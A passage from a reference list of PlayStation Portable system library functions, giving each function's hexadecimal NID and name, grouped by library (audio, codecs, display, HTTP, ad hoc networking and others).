0xFFC36A14 sceKernelReferThreadRunStatus<br /> <br /> Library: ThreadMonForUser<br /> 0x13BA4700 sceKernelThreadMonStart<br /> 0xAC447E49 sceKernelThreadMonStop<br /> 0xBA56557C sceKernelThreadMonSetBuffer<br /> 0xCE710A2C sceKernelThreadMonReset<br /> <br /> Library: UtilsForUser<br /> 0x06FB8A63 sceKernelUtilsMt19937UInt<br /> 0x16641D70 sceKernelDcacheReadTag<br /> 0x27CC57F0 sceKernelLibcTime<br /> 0x346F6DA8 sceKernelUtilsSha1BlockUpdate<br /> 0x34B9FA9E sceKernelDcacheWritebackInvalidateRange<br /> 0x37FB5C42 sceKernelGetGPI<br /> 0x3EE30821 sceKernelDcacheWritebackRange<br /> 0x43C9A8DB sceKernelL1IcacheInvalidateRange<br /> 0x4FD31C9D sceKernelIcacheProbe<br /> 0x585F1C09 sceKernelUtilsSha1BlockResult<br /> 0x61E1E525 sceKernelUtilsMd5BlockUpdate<br /> 0x6AD345D7 sceKernelSetGPO<br /> 0x71EC4271 sceKernelLibcGettimeofday<br /> 0x77DFF087 sceKernelDcacheProbeRange<br /> 0x79D1C3FA sceKernelDcacheWritebackAll<br /> 0x80001C4C sceKernelDcacheProbe<br /> 0x840259F1 sceKernelUtilsSha1Digest<br /> 0x87E81561 sceKernelPutUserLog<br /> 0x91E4F6A7 sceKernelLibcClock<br /> 0x920F104A sceKernelIcacheInvalidateAll<br /> 0x9E5C5086 sceKernelUtilsMd5BlockInit<br /> 0xB435DEC5 sceKernelDcacheWritebackInvalidateAll<br /> 0xB8D24E78 sceKernelUtilsMd5BlockResult<br /> 0xBFA98062 sceKernelDcacheInvalidateRange<br /> 0xC2DF770E sceKernelIcacheInvalidateRange<br /> 0xC8186A58 sceKernelUtilsMd5Digest<br /> 0xE860E75E sceKernelUtilsMt19937Init<br /> 0xF8FCD5BA sceKernelUtilsSha1BlockInit<br /> 0xFB05FAD0 sceKernelIcacheReadTag<br /> <br /> Library: deflt<br /> 0x0BA3B9CC sceGzipGetCompressedData_deflt<br /> 0x106A3552 sceGzipGetName_deflt<br /> 0x1B5B82BC sceGzipIsValid_deflt<br /> 0x2EE39A64 sceZlibAdler32_deflt<br /> 0x44054E03 sceDeflateDecompress_deflt<br /> 0x6A548477 sceZlibGetCompressedData_deflt<br /> 0x6DBCF897 sceGzipDecompress_deflt<br /> 0x8AA82C92 sceGzipGetInfo_deflt<br /> 0xA9E4FB28 sceZlibDecompress_deflt<br /> 0xAFE01FD3 sceZlibGetInfo_deflt<br /> 0xB767F9A0 sceGzipGetComment_deflt<br /> 0xE46EB986 sceZlibIsValid_deflt<br /> <br /> Library: sceAac<br /> 0x02098C69 sceAacGetInfoToAddStreamData<br /> 0x23D35CAE sceAacTermResource<br /> 0x33B8C009 sceAacExit<br /> 0x506BF66C sceAacGetSumDecodedSample<br /> 0x523347D9 sceAacGetLoopNum<br /> 0x5CFFC57C sceAacInitResource<br /> 0x61AA43C9 sceAacEndEntry<br /> 0x6C05813B sceAacStartEntry<br /> 0x6DC7758A sceAacGetMaxOutputSample<br /> 0x7E4CFEE4 sceAacDecode<br /> 0xAC6DCBE3 sceAacNotifyAddStreamData<br /> 0xBBDD6403 sceAacSetLoopNum<br /> 0xD2DA2BBA sceAacResetPlayPosition<br /> 0xD7C51541 sceAacCheckStreamDataNeeded<br /> 0xE0C89ACA sceAacInit<br /> <br /> Library: sceAdler<br /> 0x9702EF11 sceAdler32<br /> <br /> Library: sceAtrac3plus<br /> 0x0C116E1B sceAtracLowLevelDecode<br /> 0x0E2A73AB sceAtracSetData<br /> 0x0FAE370E sceAtracSetHalfwayBufferAndGetID<br /> 0x132F1ECA sceAtracReinit<br /> 0x1575D64B sceAtracLowLevelInitDecoder<br /> 0x231FC6B7 _sceAtracGetContextAddress<br /> 0x2DD3E298 sceAtracGetBufferInfoForResetting<br /> 0x31668BAA sceAtracGetChannel<br /> 0x36FAABFB sceAtracGetNextSample<br /> 0x3F6E26B5 sceAtracSetHalfwayBuffer<br /> 0x5622B7C1 sceAtracSetAA3DataAndGetID<br /> 0x5CF9D852 sceAtracSetMOutHalfwayBuffer<br /> 0x5D268707 sceAtracGetStreamDataInfo<br /> 0x5DD66588 sceAtracSetAA3HalfwayBufferAndGetID<br /> 0x61EB33F5 sceAtracReleaseAtracID<br /> 0x644E5607 sceAtracResetPlayPosition<br /> 0x6A8C3CD5 sceAtracDecodeData<br /> 0x780F88D1 sceAtracGetAtracID<br /> 0x7A20E7AF sceAtracSetDataAndGetID<br /> 0x7DB31251 sceAtracAddStreamData<br /> 0x83BF7AFD sceAtracSetSecondBuffer<br /> 0x83E85EA0 sceAtracGetSecondBufferInfo<br /> 0x868120B5 sceAtracSetLoopNum<br /> 0x9AE849A7 sceAtracGetRemainFrame<br /> 0x9CD7DE03 sceAtracSetMOutHalfwayBufferAndGetID<br /> 0xA2BBA8BE sceAtracGetSoundSample<br /> 0xA554A158 sceAtracGetBitrate<br /> 0xB3B5D042 sceAtracGetOutputChannel<br /> 0xCA3CA3D2 sceAtracGetBufferInfoForReseting<br /> 0xD1F59FDB sceAtracStartEntry<br /> 0xD5C28CC0 sceAtracEndEntry<br /> 0xD6A5F2F7 sceAtracGetMaxSample<br /> 0xE23E3A35 sceAtracGetNextDecodePosition<br /> 0xE88F759B sceAtracGetInternalErrorInfo<br /> 0xECA32A99 sceAtracIsSecondBufferNeeded<br /> 0xFAA4F89B sceAtracGetLoopStatus<br /> <br /> Library: sceAudio<br /> 0x01562BA3 sceAudioOutput2Reserve<br /> 0x086E5895 sceAudioInputBlocking<br /> 0x136CAF51 sceAudioOutputBlocking<br /> 0x13F592BC sceAudioOutputPannedBlocking<br /> 0x2D53F36E sceAudioOutput2OutputBlocking<br /> 0x41EFADE7 sceAudioOneshotOutput<br /> 0x43196845 sceAudioOutput2Release<br /> 0x5EC81C55 sceAudioChReserve<br /> 0x63F2889C sceAudioOutput2ChangeLength<br /> 0x647CEF33 sceAudioOutput2GetRestSample<br /> 0x6D4BEC68 sceAudioInput<br /> 0x6FC46853 sceAudioChRelease<br /> 0x7DE61688 sceAudioInputInit<br /> 0x87B2E651 sceAudioWaitInputEnd<br /> 0x8C1009B2 sceAudioOutput<br /> 0x95FD0C2D sceAudioChangeChannelConfig<br /> 0xA633048E sceAudioPollInputEnd<br /> 0xA708C6A6 sceAudioGetInputLength<br /> 0xB011922F sceAudioGetChannelRestLength<br /> 0xB7E1D8E7 sceAudioChangeChannelVolume<br /> 0xCB2E439E sceAudioSetChannelDataLen<br /> 0xE2D56B2D sceAudioOutputPanned<br /> 0xE926D3FB sceAudioInputInitEx<br /> 0xE9D97901 sceAudioGetChannelRestLen<br /> <br /> Library: sceAudioRouting<br /> 0x28235C56 sceAudioRoutingGetVolumeMode<br /> 0x36FD8AA9 sceAudioRoutingSetMode<br /> 0x39240E7D sceAudioRoutingGetMode<br /> 0xBB548475 sceAudioRoutingSetVolumeMode<br /> <br /> Library: sceBase16<br /> 0x7AD4677A sceBase16Encoder<br /> 0xFF021EBB sceBase16Decoder<br /> <br /> Library: sceBase32<br /> 0x1D2F25FE sceBase32Encoder<br /> 0x79AE12DD sceBase32HexEncoder<br /> 0xC593B079 sceBase32HexDecoder<br /> 0xD5A58F29 sceBase32Decoder<br /> <br /> Library: sceBase64<br /> 0x3AE99AAF sceBase64Decoder<br /> 0x43543731 sceBase64Encoder<br /> <br /> Library: sceCcc<br /> 0x00D1378F sceCccUTF8toUTF16<br /> 0x068C4320 sceCccEncodeSJIS<br /> 0x17E1D813 sceCccSetErrorCharUTF8<br /> 0x41B724A5 sceCccUTF16toUTF8<br /> 0x4BDEB2A8 sceCccStrlenUTF16<br /> 0x67BF0D19 sceCccIsValidSJIS<br /> 0x6F82EE03 sceCccUTF8toSJIS<br /> 0x70ECAA10 sceCccUCStoJIS<br /> 0x76E33E9C sceCccIsValidUCS2<br /> 0x8406F469 sceCccEncodeUTF16<br /> 0x90521AC5 sceCccIsValidUTF8<br /> 0x92C05851 sceCccEncodeUTF8<br /> 0x953E6C10 sceCccDecodeSJIS<br /> 0xA2D5D209 sceCccIsValidJIS<br /> 0xA62E6E80 sceCccSJIStoUTF8<br /> 0xB4D1CBBF sceCccSetTable<br /> 0xB7D3C112 sceCccStrlenUTF8<br /> 0xB8476CF4 sceCccSetErrorCharUTF16<br /> 0xBD11EEF3 sceCccIsValidUnicode<br /> 0xBEB47224 sceCccSJIStoUTF16<br /> 0xC56949AD sceCccSetErrorCharSJIS<br /> 0xC6A8BEE2 sceCccDecodeUTF8<br /> 0xCC0A8BDA sceCccIsValidUTF16<br /> 0xD2B18485 sceCccIsValidUCS4<br /> 0xD9392CCB sceCccStrlenSJIS<br /> 0xE0CF8091 sceCccDecodeUTF16<br /> 0xF1B73D12 sceCccUTF16toSJIS<br /> 0xFB7846E2 sceCccJIStoUCS<br /> <br /> Library: sceCtrl<br /> 0x02BAAD91 sceCtrlGetSamplingCycle<br /> 0x0B588501 sceCtrlReadLatch<br /> 0x1F4011E6 sceCtrlSetSamplingMode<br /> 0x1F803938 sceCtrlReadBufferPositive<br /> 0x3A622550 sceCtrlPeekBufferPositive<br /> 0x60B81F86 sceCtrlReadBufferNegative<br /> 0x6841BE1A sceCtrlSetRapidFire<br /> 0x687660FA sceCtrlGetIdleCancelThreshold<br /> 0x6A2774F3 sceCtrlSetSamplingCycle<br /> 0xA68FD260 sceCtrlClearRapidFire<br /> 0xA7144800 sceCtrlSetIdleCancelThreshold<br /> 0xB1D0E5CD sceCtrlPeekLatch<br /> 0xC152080A sceCtrlPeekBufferNegative<br /> 0xDA6B76A1 sceCtrlGetSamplingMode<br /> <br /> Library: sceDeci2pForUser<br /> 0x46588220 sceKernelDeci2pOpen<br /> 0x5947AE64 sceKernelDeci2pClose<br /> 0x6E2E0BF3 sceKernelDeci2pWrite<br /> 0x9736CCD5 sceKernelDeci2pRead<br /> 0xA9542A53 sceKernelDeci2pRegisterCallback<br /> <br /> Library: sceDeflt<br /> 0x0BA3B9CC sceGzipGetCompressedData<br /> 0x106A3552 sceGzipGetName<br /> 0x1B5B82BC sceGzipIsValid<br /> 0x2EE39A64 sceZlibAdler32<br /> 0x44054E03 sceDeflateDecompress<br /> 0x6A548477 sceZlibGetCompressedData<br /> 0x6DBCF897 sceGzipDecompress<br /> 0x8AA82C92 sceGzipGetInfo<br /> 0xA9E4FB28 sceZlibDecompress<br /> 0xAFE01FD3 sceZlibGetInfo<br /> 0xB767F9A0 sceGzipGetComment<br /> 0xE46EB986 sceZlibIsValid<br /> <br /> Library: sceDisplay<br /> 0x0E20F177 sceDisplaySetMode<br /> 0x210EAB3A sceDisplayGetAccumulatedHcount<br /> 0x289D82FE sceDisplaySetFrameBuf<br /> 0x36CDFADE sceDisplayWaitVblank<br /> 0x40F1469C sceDisplayWaitVblankStartMulti<br /> 0x46F186C3 sceDisplayWaitVblankStartCB<br /> 0x4D4E10EC sceDisplayIsVblank<br /> 0x773DD3A3 sceDisplayGetCurrentHcount<br /> 0x77ED8B3A sceDisplayWaitVblankStartMultiCB<br /> 0x7ED59BC4 sceDisplaySetHoldMode<br /> 0x8EB9EC49 sceDisplayWaitVblankCB<br /> 0x984C27E7 sceDisplayWaitVblankStart<br /> 0x9C6EAAD7 sceDisplayGetVcount<br /> 0xB4F378FA sceDisplayIsForeground<br /> 0xDBA6C4C4 sceDisplayGetFramePerSec<br /> 0xDEA197D4 sceDisplayGetMode<br /> 0xEEDA2E54 sceDisplayGetFrameBuf<br /> <br /> Library: sceDmac<br /> 0x617F3FE6 sceDmacMemcpy<br /> <br /> Library: sceG729<br /> 0x13F1028A sceG729DecodeExit<br /> 0x17C11696 sceG729DecodeInitResource<br /> 0x3489D1F3 sceG729DecodeCore<br /> 0x55E14F75 sceG729DecodeInit<br /> 0x5A409D1B sceG729EncodeExit<br /> 0x74804D93 sceG729DecodeReset<br /> 0x890B86AE sceG729DecodeTermResource<br /> 0x8C87A2CA sceG729EncodeReset<br /> 0x94714D50 sceG729EncodeTermResource<br /> 0xAA1E5462 sceG729EncodeInitResource<br /> 0xCFCD367C sceG729EncodeInit<br /> 0xDB7259D5 sceG729EncodeCore<br /> <br /> Library: sceGameUpdate<br /> 0x596AD78C sceGameUpdateRun<br /> 0x5F5D98A6 sceGameUpdateAbort<br /> 0xBB4B68DE sceGameUpdateTerm<br /> 0xCBE69FB3 sceGameUpdateInit<br /> <br /> Library: sceGe_user<br /> 0x03444EB4 sceGeListSync<br /> 0x05DB22CE sceGeUnsetCallback<br /> 0x0BF608FB sceGeRestoreContext<br /> 0x1C0D95A6 sceGeListEnQueueHead<br /> 0x1F6752AD sceGeEdramGetSize<br /> 0x438A385A sceGeSaveContext<br /> 0x4C06E472 sceGeContinue<br /> 0x57C8945B sceGeGetMtx<br /> 0x5FB86AB0 sceGeListDeQueue<br /> 0xA4FC06A4 sceGeSetCallback<br /> 0xAB49E76A sceGeListEnQueue<br /> 0xB287BD61 sceGeDrawSync<br /> 0xB448EC0D sceGeBreak<br /> 0xB77905EA sceGeEdramSetAddrTranslation<br /> 0xDC93CFEF sceGeGetCmd<br /> 0xE0D68148 sceGeListUpdateStallAddr<br /> 0xE47E40E4 sceGeEdramGetAddr<br /> <br /> Library: sceHeap<br /> 0x0E875980 sceHeapReallocHeapMemory<br /> 0x1C84B58D sceHeapReallocHeapMemoryWithOption<br /> 0x2A0C2009 sceHeapGetMallinfo<br /> 0x2ABADC63 sceHeapFreeHeapMemory<br /> 0x2B7299D8 sceHeapAllocHeapMemoryWithOption<br /> 0x4929B40D sceHeapGetTotalFreeSize<br /> 0x7012BBDD sceHeapIsAllocatedHeapMemory<br /> 0x70210B73 sceHeapDeleteHeap<br /> 0x7DE281C2 sceHeapCreateHeap<br /> 0xA8E102A0 sceHeapAllocHeapMemory<br /> <br /> Library: sceHprm<br /> 0x208DB1BD sceHprmIsRemoteExist<br /> 0x219C58F1 sceHprmIsMicrophoneExist<br /> 0x2BCEC83E sceHprmPeekLatch<br /> 0x40D2F9F0 sceHprmReadLatch<br /> 0x444ED0B7 sceHprmUnregitserCallback<br /> 0x7E69EDA4 sceHprmIsHeadphoneExist<br /> 0xC7154136 sceHprmRegisterCallback<br /> 0xFD7DE6CD sceHprmUnregisterCallback<br /> <br /> Library: sceHttp<br /> 0x0282A3BD sceHttpGetContentLength<br /> 0x03D9526F sceHttpSetResolveRetry<br /> 0x06488A1C sceHttpSetCookieSendCallback<br /> 0x0809C831 sceHttpEnableRedirect<br /> 0x0B12ABFB sceHttpDisableCookie<br /> 0x0DAFA58F sceHttpEnableCookie<br /> 0x15540184 sceHttpDeleteHeader<br /> 0x1A0EBB69 sceHttpDisableRedirect<br /> 0x1CEDB9D4 sceHttpFlushCache<br /> 0x1F0FC3E3 sceHttpSetRecvTimeOut<br /> 0x2255551E sceHttpGetNetworkPspError<br /> 0x267618F4 sceHttpSetAuthInfoCallback<br /> 0x2A6C3296 sceHttpSetAuthInfoCB<br /> 0x2C3C82CF sceHttpFlushAuthList<br /> 0x3A67F306 sceHttpSetCookieRecvCallback<br /> 0x3EABA285 sceHttpAddExtraHeader<br /> 0x47347B50 sceHttpCreateRequest<br /> 0x47940436 sceHttpSetResolveTimeOut<br /> 0x4CC7D78F sceHttpGetStatusCode<br /> 0x5152773B sceHttpDeleteConnection<br /> 0x54E7DF75 sceHttpIsRequestInCache<br /> 0x569A1481 sceHttpsSetSslCallback<br /> 0x59E6D16F sceHttpEnableCache<br /> 0x68AB0F86 sceHttpsInitWithPath<br /> 0x76D1363B sceHttpSaveSystemCookie<br /> 0x7774BF4C sceHttpAddCookie<br /> 0x78A0D3EC sceHttpEnableKeepAlive<br /> 0x78B54C09 sceHttpEndCache<br /> 0x87797BDD sceHttpsLoadDefaultCert<br /> 0x8ACD1F73 sceHttpSetConnectTimeOut<br /> 0x8EEFD953 sceHttpCreateConnection<br /> 0x9668864C sceHttpSetRecvBlockSize<br /> 0x96F16D3E sceHttpGetCookie<br /> 0x9988172D sceHttpSetSendTimeOut<br /> 0x9AFC98B2 sceHttpSendRequestInCacheFirstMode<br /> 0x9B1F1F36 sceHttpCreateTemplate<br /> 0x9FC5F10D sceHttpEnableAuth<br /> 0xA4496DE5 sceHttpSetRedirectCallback<br /> 0xA5512E01 sceHttpDeleteRequest<br /> 0xA6800C34 sceHttpInitCache<br /> 0xAB1540D5 sceHttpsGetSslError<br /> 0xAB1ABE07 sceHttpInit<br /> 0xAE948FEE sceHttpDisableAuth<br /> 0xB0C34B1D sceHttpSetCacheContentLengthMaxSize<br /> 0xB3FAF831 sceHttpsDisableOption<br /> 0xB509B09E sceHttpCreateRequestWithURL<br /> 0xBAC31BF1 sceHttpsEnableOption<br /> 0xBB70706F sceHttpSendRequest<br /> 0xC10B6BD9 sceHttpAbortRequest<br /> 0xC6330B0D sceHttpChangeHttpVersion<br /> 0xC7EF2559 sceHttpDisableKeepAlive<br /> 0xC98CBBA7 sceHttpSetResHeaderMaxSize<br /> 0xCCBD167A sceHttpDisableCache<br /> 0xCDF8ECB9 sceHttpCreateConnectionWithURL<br /> 0xD081EC8F sceHttpGetNetworkErrno<br /> 0xD11DAB01 sceHttpsGetCaList<br /> 0xD1C8945E sceHttpEnd<br /> 0xD70D4847 sceHttpGetProxy<br /> 0xDB266CCF sceHttpGetAllHeader<br /> 0xE4D21302 sceHttpsInit<br /> 0xEDEEB999 sceHttpReadData<br /> 0xF0F46C62 sceHttpSetProxy<br /> 0xF1657B22 sceHttpLoadSystemCookie<br /> 0xF49934F6 sceHttpSetMallocFunction<br /> 0xF9D8EB63 sceHttpsEnd<br /> 0xFCF8C055 sceHttpDeleteTemplate<br /> <br /> Library: sceImpose<br /> 0x24FD7BCF sceImposeGetLanguageMode<br /> 0x36AA6E91 sceImposeSetLanguageMode<br /> 0x72189C48 sceImposeSetUMDPopup<br /> 0x8C943191 sceImposeGetBatteryIconStatus<br /> 0x8F6E3518 sceImposeGetBacklightOffTime<br /> 0x967F6D4A sceImposeSetBacklightOffTime<br /> 0xE0887BC8 sceImposeGetUMDPopup<br /> <br /> Library: sceJpeg<br /> 0x04B5AE02 sceJpegMJpegCsc<br /> 0x04B93CEF sceJpegDecodeMJpeg<br /> 0x227662D7 sceJpegDecodeMJpegYCbCrSuccessively<br /> 0x48B602B7 sceJpegDeleteMJpeg<br /> 0x64B6F978 sceJpegDecodeMJpegSuccessively<br /> 0x67F0ED84 sceJpegCsc<br /> 0x7D2F3D7F sceJpegFinishMJpeg<br /> 0x8F2BB012 sceJpegGetOutputInfo<br /> 0x91EED83C sceJpegDecodeMJpegYCbCr<br /> 0x9D47469C sceJpegCreateMJpeg<br /> 0xA06A75C4 sceJpegMJpegCscWithColorOption<br /> 0xAC9E70E6 sceJpegInitMJpeg<br /> <br /> Library: sceMd5<br /> 0x19884A15 sceMd5BlockInit<br /> 0x4876AFFF sceMd5BlockResult<br /> 0x98E31A9E sceMd5Digest<br /> 0xA30206C2 sceMd5BlockUpdate<br /> <br /> Library: sceMp3<br /> 0x07EC321A sceMp3ReserveMp3Handle<br /> 0x0840E808 sceMp3ResetPlayPositionByFrame<br /> 0x0DB149F4 sceMp3NotifyAddStreamData<br /> 0x1B839B83 sceMp3LowLevelInit<br /> 0x2A368661 sceMp3ResetPlayPosition<br /> 0x3548AEC8 sceMp3GetFrameNum<br /> 0x354D27EA sceMp3GetSumDecodedSample<br /> 0x35750070 sceMp3InitResource<br /> 0x3C2FA058 sceMp3TermResource<br /> 0x3CEF484F sceMp3SetLoopNum<br /> 0x44E07129 sceMp3Init<br /> 0x732B042A sceMp3EndEntry<br /> 0x7F696782 sceMp3GetMp3ChannelNum<br /> 0x87677E40 sceMp3GetBitRate<br /> 0x87C263D1 sceMp3GetMaxOutputSample<br /> 0x8AB81558 sceMp3StartEntry<br /> 0x8F450998 sceMp3GetSamplingRate<br /> 0xA703FE0F sceMp3GetInfoToAddStreamData<br /> 0xAE6D2027 sceMp3GetMPEGVersion<br /> 0xD021C0FB sceMp3Decode<br /> 0xD0A56296 sceMp3CheckStreamDataNeeded<br /> 0xD8F54A51 sceMp3GetLoopNum<br /> 0xE3EE2C81 sceMp3LowLevelDecode<br /> 0xF5478233 sceMp3ReleaseMp3Handle<br /> <br /> Library: sceMp4<br /> 0x01C76489 sceMp4TrackSampleBufDestruct<br /> 0x0F0187D2 sceMp4GetAvcTrackInfoData<br /> 0x10EE0D2C sceMp4AacDecodeInit<br /> 0x113E9E7B sceMp4GetNumberOfMetaData<br /> 0x131BDE57 sceMp4InitAu<br /> 0x17EAA97D sceMp4GetAvcAuWithoutSampleBuf<br /> 0x28CCB940 sceMp4GetTrackEditList<br /> 0x3069C2B5 sceMp4GetAvcParamSet<br /> 0x31BCD7E0 sceMp4TrackSampleBufPut<br /> 0x427BEF7F sceMp4GetTrackNumOfEditList<br /> 0x496E8A65 sceMp4TrackSampleBufFlush<br /> 0x4ED4AB1E sceMp4AacDecodeInitResource<br /> 0x4FB5B756 sceMp4GetMetaDataInfo<br /> 0x503A3CBA sceMp4GetAvcAu<br /> 0x532029B8 sceMp4GetAacAuWithoutSampleBuf<br /> 0x538C2057 sceMp4Delete<br /> 0x5601A6F0 sceMp4GetAacAu<br /> 0x5D72B333 sceMp4AacDecodeExit<br /> 0x5EB65F26 sceMp4GetNumberOfSpecificTrack<br /> 0x6710FE77 sceMp4UnregistTrack<br /> 0x68651CBC sceMp4Init<br /> 0x7443AF1D sceMp4GetMovieInfo<br /> 0x74A1CA3E sceMp4SearchSyncSampleNum<br /> 0x7663CB5C sceMp4AacDecode<br /> 0x7ADFD01C sceMp4RegistTrack<br /> 0x7D332394 sceMp4AacDecodeTermResource<br /> 0x8754ECB8 sceMp4TrackSampleBufAvailableSize<br /> 0x9042B257 sceMp4Finish<br /> 0x9C8F4FC1 sceMp4TrackSampleBufConstruct<br /> 0x9CE6F5CF sceMp4GetAacTrackInfoData<br /> 0xA6C724DC sceMp4GetSampleNum<br /> 0xB1221EE7 sceMp4Create<br /> 0xB4B400D1 sceMp4GetSampleNumWithTimeStamp<br /> 0xBCA9389C sceMp4TrackSampleBufQueryMemSize<br /> 0xD2AC9A7E sceMp4GetMetaData<br /> 0xD8250B75 sceMp4PutSampleNum<br /> 0xF7C51EC1 sceMp4GetSampleInfo<br /> <br /> Library: sceMpeg<br /> 0x01977054 sceMpegGetUserdataAu<br /> 0x0558B075 sceMpegAvcCopyYCbCr<br /> 0x0E3C2E9D sceMpegAvcDecode<br /> 0x0F6C18D7 sceMpegAvcDecodeDetail<br /> 0x11F95CF1 sceMpegGetAvcNalAu<br /> 0x13407F13 sceMpegRingbufferDestruct<br /> 0x167AFD9E sceMpegInitAu<br /> 0x211A057C sceMpegAvcQueryYCbCrSize<br /> 0x21FF80E4 sceMpegQueryStreamOffset<br /> 0x234586AE sceMpegChangeGetAvcAuMode<br /> 0x31BD0272 sceMpegAvcCsc<br /> 0x37295ED8 sceMpegRingbufferConstruct<br /> 0x3C37A7A6 sceMpegNextAvcRpAu<br /> 0x42560F23 sceMpegRegistStream<br /> 0x4571CC64 sceMpegAvcDecodeFlush<br /> 0x500F0429 sceMpegFlushStream<br /> 0x591A4AA2 sceMpegUnRegistStream<br /> 0x606A4649 sceMpegDelete<br /> 0x611E9E11 sceMpegQueryStreamSize<br /> 0x63B9536A sceMpegAvcResourceGetAvcDecTopAddr<br /> 0x67179B1B sceMpegAvcInitYCbCr<br /> 0x682A619B sceMpegInit<br /> 0x707B7629 sceMpegFlushAllStream<br /> 0x740FCCD1 sceMpegAvcDecodeStop<br /> 0x769BEBB6 sceMpegRingbufferQueryPackNum<br /> 0x800C44DF sceMpegAtracDecode<br /> 0x8160A2FE sceMpegAvcResourceFinish<br /> 0x874624D6 sceMpegFinish<br /> 0x8C1E027D sceMpegGetPcmAu<br /> 0x921FCCCF sceMpegGetAvcEsAu<br /> 0x9DCFB7EA sceMpegChangeGetAuMode<br /> 0xA11C7026 sceMpegAvcDecodeMode<br /> 0xA780CF7E sceMpegMallocAvcEsBuf<br /> 0xAB0E9556 sceMpegAvcDecodeDetailIndex<br /> 0xAF26BB01 sceMpegAvcResourceGetAvcEsBuf<br /> 0xB240A59E sceMpegRingbufferPut<br /> 0xB5F6DC87 sceMpegRingbufferAvailableSize<br /> 0xC02CF6B5 sceMpegQueryPcmEsSize<br /> 0xC132E22F sceMpegQueryMemSize<br /> 0xC45C99CC sceMpegQueryUserdataEsSize<br /> 0xCEB870B1 sceMpegFreeAvcEsBuf<br /> 0xD7A29F46 sceMpegRingbufferQueryMemSize<br /> 0xD8C5F121 sceMpegCreate<br /> 0xE1CE83A7 sceMpegGetAtracAu<br /> 0xF0EB1125 sceMpegAvcDecodeYCbCr<br /> 0xF2930C9C sceMpegAvcDecodeStopYCbCr<br /> 0xF5E7EA31 sceMpegAvcConvertToYuv420<br /> 0xF8DCB679 sceMpegQueryAtracEsSize<br /> 0xFCBDB5AD sceMpegAvcResourceInit<br /> 0xFE246728 sceMpegGetAvcAu<br /> <br /> Library: sceMt19937<br /> 0xECF5D379 sceMt19937Init<br /> 0xF40C98E6 sceMt19937UInt<br /> <br /> Library: sceNet<br /> 0x0BF0A3AE sceNetGetLocalEtherAddr<br /> 0x281928A9 sceNetTerm<br /> 0x39AF39A6 sceNetInit<br /> 0x50647530 sceNetFreeThreadinfo<br /> 0x89360950 sceNetEtherNtostr<br /> 0xAD6844C6 sceNetThreadAbort<br /> 0xCC393E48 sceNetGetMallocStat<br /> 0xD27961C9 sceNetEtherStrton<br /> <br /> Library: sceNetAdhoc<br /> 0x0B2228E9 sceNetAdhocGameModeDeleteReplica<br /> 0x157E6225 sceNetAdhocPtpClose<br /> 0x3278AB0C sceNetAdhocGameModeCreateReplica<br /> 0x4D2CE199 sceNetAdhocGetSocketAlert<br /> 0x4DA4C788 sceNetAdhocPtpSend<br /> 0x6F92741B sceNetAdhocPdpCreate<br /> 0x73BFD52D sceNetAdhocSetSocketAlert<br /> 0x7A662D6B sceNetAdhocPollSocket<br /> 0x7F27BB5E sceNetAdhocPdpDelete<br /> 0x7F75C338 sceNetAdhocGameModeCreateMaster<br /> 0x877F6D66 sceNetAdhocPtpOpen<br /> 0x8BEA2B3E sceNetAdhocPtpRecv<br /> 0x98C204C8 sceNetAdhocGameModeUpdateMaster<br /> 0x9AC2EEAC sceNetAdhocPtpFlush<br /> 0x9DF81198 sceNetAdhocPtpAccept<br /> 0xA0229362 sceNetAdhocGameModeDeleteMaster<br /> 0xA62C6F57 sceNetAdhocTerm<br /> 0xABED3790 sceNetAdhocPdpSend<br /> 0xB9685118 sceNetAdhocGetPtpStat<br /> 0xC7C1FC57 sceNetAdhocGetPdpStat<br /> 0xDFE53E03 sceNetAdhocPdpRecv<br /> 0xE08BDAC1 sceNetAdhocPtpListen<br /> 0xE1D621D7 sceNetAdhocInit<br /> 0xFA324B4E sceNetAdhocGameModeUpdateReplica<br /> 0xFC6FC07B sceNetAdhocPtpConnect<br /> <br /> Library: sceNetAdhocDiscover<br /> 0x52DE1B97 sceNetAdhocDiscoverUpdate<br /> 0x941B3877 sceNetAdhocDiscoverInitStart<br /> 0x944DDBC6 sceNetAdhocDiscoverGetStatus<br /> 0xA2246614 sceNetAdhocDiscoverTerm<br /> 0xA423A21B sceNetAdhocDiscoverRequestSuspend<br /> 0xF7D13214 sceNetAdhocDiscoverStop<br /> <br /> Library: sceNetAdhocMatching<br /> 0x2A2A1E07 sceNetAdhocMatchingInit<br /> 0x32B156B3 sceNetAdhocMatchingStop<br /> 0x40F8F435 sceNetAdhocMatchingGetPoolMaxAlloc<br /> 0x5E3D4B79 sceNetAdhocMatchingSelectTarget<br /> 0x7945ECDA sceNetAdhocMatchingTerm<br /> 0x8F58BEDF sceNetAdhocMatchingCancelTargetWithOpt<br /> 0x93EF3843 sceNetAdhocMatchingStart<br /> 0x9C5CFB7D sceNetAdhocMatchingGetPoolStat<br /> 0xB58E61B7 sceNetAdhocMatchingSetHelloOpt<br /> 0xB5D96C2A sceNetAdhocMatchingGetHelloOpt<br /> 0xC58BCD9E sceNetAdhocMatchingGetMembers<br /> 0xCA5EDA6F sceNetAdhocMatchingCreate<br /> 0xEA3C6108 sceNetAdhocMatchingCancelTarget<br /> 0xEC19337D sceNetAdhocMatchingAbortSendData<br /> 0xF16EAF4F sceNetAdhocMatchingDelete<br /> 0xF79472D7 sceNetAdhocMatchingSendData<br /> <br /> Library: sceNetAdhocctl<br /> 0x08FFF7A0 sceNetAdhocctlScan<br /> 0x0AD043ED sceNetAdhocctlConnect<br /> 0x1FF89745 sceNetAdhocctlJoinEnterGameMode<br /> 0x20B317A0 sceNetAdhocctlAddHandler<br /> 0x34401D65 sceNetAdhocctlDisconnect<br /> 0x362CBE8F sceNetAdhocctlGetAdhocId<br /> 0x5A014CE0 sceNetAdhocctlGetGameModeInfo<br /> 0x5E7F79C9 sceNetAdhocctlJoin<br /> 0x6402490B sceNetAdhocctlDelHandler<br /> 0x75ECD386 sceNetAdhocctlGetState<br /> 0x81AEE1BE sceNetAdhocctlGetScanInfo<br /> 0x8916C003 sceNetAdhocctlGetNameByAddr<br /> 0x8DB83FDC sceNetAdhocctlGetPeerInfo<br /> 0x99560ABE sceNetAdhocctlGetAddrByName<br /> 0x9D689E13 sceNetAdhocctlTerm<br /> 0xA5C055CE sceNetAdhocctlCreateEnterGameMode<br /> 0xB0B80E80 sceNetAdhocctlCreateEnterGameModeMin<br /> 0xCF8E084D sceNetAdhocctlExitGameMode<br /> 0xDED9D28E sceNetAdhocctlGetParameter<br /> 0xE162CB14 sceNetAdhocctlGetPeerList<br /> 0xE26F226E sceNetAdhocctlInit<br /> 0xEC0635C1 